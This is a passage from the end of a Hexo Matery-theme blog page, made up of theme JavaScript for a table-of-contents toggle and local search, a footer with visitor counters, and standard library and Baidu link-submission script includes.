            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022</span>
            
            <a href="/about" target="_blank">Zh0um1</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Zh0um1" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
